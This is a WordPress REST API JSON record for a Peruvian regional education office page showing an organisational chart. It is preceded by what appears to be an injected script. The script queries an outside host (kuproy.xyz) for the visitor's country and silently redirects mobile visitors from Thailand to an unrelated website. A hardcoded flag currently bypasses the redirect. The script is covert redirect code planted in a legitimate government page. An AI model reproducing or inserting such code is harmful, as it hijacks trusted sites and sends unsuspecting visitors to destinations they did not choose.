<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":228,"date":"2021-11-24T15:59:55","date_gmt":"2021-11-24T15:59:55","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?page_id=228"},"modified":"2021-11-25T20:28:25","modified_gmt":"2021-11-25T20:28:25","slug":"cuadro-organico-de-cargos","status":"publish","type":"page","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/cuadro-organico-de-cargos\/","title":{"rendered":"Cuadro Org\u00e1nico de Cargos"},"content":{"rendered":"\n<h2 class=\"has-text-align-center has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#202f5b\">CUADRO ORG\u00c1NICO DE CARGOS<\/h2>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"666\" height=\"788\" src=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2021\/11\/CUADRO-ORGANICO-DE-CARGOS.png\" alt=\"\" class=\"wp-image-284\" srcset=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2021\/11\/CUADRO-ORGANICO-DE-CARGOS.png 666w, https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2021\/11\/CUADRO-ORGANICO-DE-CARGOS-254x300.png 254w\" sizes=\"auto, (max-width: 666px) 100vw, 666px\" \/><\/figure><\/div>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<div class=\"wp-block-buttons is-layout-flex wp-block-buttons-is-layout-flex\"><\/div>\n\n\n\n<div class=\"wp-block-buttons is-content-justification-right is-layout-flex wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button\"><a class=\"wp-block-button__link has-white-color has-text-color has-background\" href=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/institucion\/\" style=\"background-color:#1151d3\">Ir a Instituci\u00f3n<\/a><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>CUADRO ORG\u00c1NICO DE CARGOS<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-228","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/pages\/228","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=228"}],"version-history":[{"count":7,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/pages\/228\/revisions"}],"predecessor-version":[{"id":541,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/pages\/228\/revisions\/541"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=228"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}